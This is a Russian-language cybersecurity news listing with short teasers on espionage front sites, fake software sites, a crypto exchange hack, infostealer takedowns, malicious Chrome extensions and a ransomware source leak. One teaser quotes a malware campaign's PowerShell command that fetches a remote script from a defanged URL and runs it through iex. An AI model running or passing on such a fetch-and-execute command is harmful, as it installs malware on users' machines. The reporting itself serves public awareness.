UfoLabs - Лаборатория нло

То, что казалось фан-сайтом, оказалось глобальной сетью агентуры США. Первое раскрытие этой схемы произошло более десяти лет назад — в Иране. Тогда местные спецслужбы обнаружили сеть сайтов и начали охоту на подозрительных лиц, которая впоследствии привела к массовым арестам и убийствам агентов ЦРУ в Китае в 2011–2012 годах. По данным расследования Yahoo News, утечка из Ирана сыграла...

Идеальный план мошенников: отключить официальный сайт, залить фейк и ждать, пока жертва приползёт сама. Кибермошенники расширили масштабы атаки Bumblebee , нацеленной на пользователей популярного ПО: создали поддельные сайты, имитирующие легитимные проекты с открытым исходным кодом, и продвигают их через поисковую оптимизацию. Ранее на этой неделе специалисты...

Хакеры ушли с деньгами, пользователи с вопросами. Виновата дыра в коде, но будет ли наказание? Децентрализованная биржа Cetus Protocol стала жертвой крупнейшего ограбления в истории криптовалютной индустрии, потеряв 223 миллиона долларов США в цифровых активах. Проект объявил о готовности заключить сделку с хакерами , обещая прекратить все правовые...

Полмиллиона просмотров и тысячи заражённых устройств. Как хакерам это удаётся? Вредоносная цепочка запускается, когда пользователь, следуя «инструкции», нажимает Windows + R и запускает PowerShell с командой вроде iwr hxxps://allaivo.me/spotify -UseBasicParsing | iex. Этот скрипт: создаёт скрытые директории в APPDATA и LOCALAPPDATA; добавляет их в исключения Windows...

Теперь ваши переписки не попадут в индекс ИИ-инструмента от Microsoft. Мессенджер Signal сообщил, что в последней версии для Windows теперь по умолчанию запрещено делать скриншоты интерфейса приложения. Причина — новая функция Windows 11 под названием Recall. Этот инструмент на базе ИИ, который делает снимки экрана, индексирует и сохраняет почти всё, что делает...

Новая волна атак на бизнес в России. «Лаборатория Касперского» зафиксировала новый виток целевых атак на российский бизнес с использованием схемы подмены электронной переписки. Мошенники рассылают фальшивые письма, в которых представляются подрядчиками и ссылаются на якобы достигнутые договорённости с генеральным директором жертвы. Цель — убедить бухгалтерию...

Те, кто считал себя вне досягаемости, внезапно потеряли контроль. В первой половине мая 2025 года международная операция, направленная на разрушение инфраструктуры Lumma Stealer — одного из самых массово используемых вредоносных сервисов категории «инфостилер», привела к масштабным результатам. Благодаря скоординированным действиям сразу нескольких IT-компаний и...

Никто не ожидал, что вредонос можно так легко найти в официальном источнике. С февраля 2024 года в магазине расширений Chrome Web Store распространяются вредоносные браузерные дополнения, маскирующиеся под полезные утилиты, но на деле используемые для кражи данных, перехвата сессий и запуска произвольного кода. Эти дополнения создаются неизвестной группой и...

Статья детально анализирует модель китайского интернета, включая систему цензуры и фильтрации, заблокированные международные платформы и их местные аналоги, законодательную базу регулирования, систему социального кредита, влияние на бизнес и перспективы развития цифровой экосистемы Китая. Китайская Народная Республика представляет собой уникальный феномен в мировом...

VanHelsing утопил собственную империю шантажа, лишь бы не дать нажиться предателю. Киберпреступная группировка, стоящая за программой-вымогателем VanHelsing, сама опубликовала исходный код своего админ-панели, блога с утечками данных и билдера для Windows — после того, как один из бывших разработчиков попытался продать его на хакерском форуме RAMP. Инцидент стал...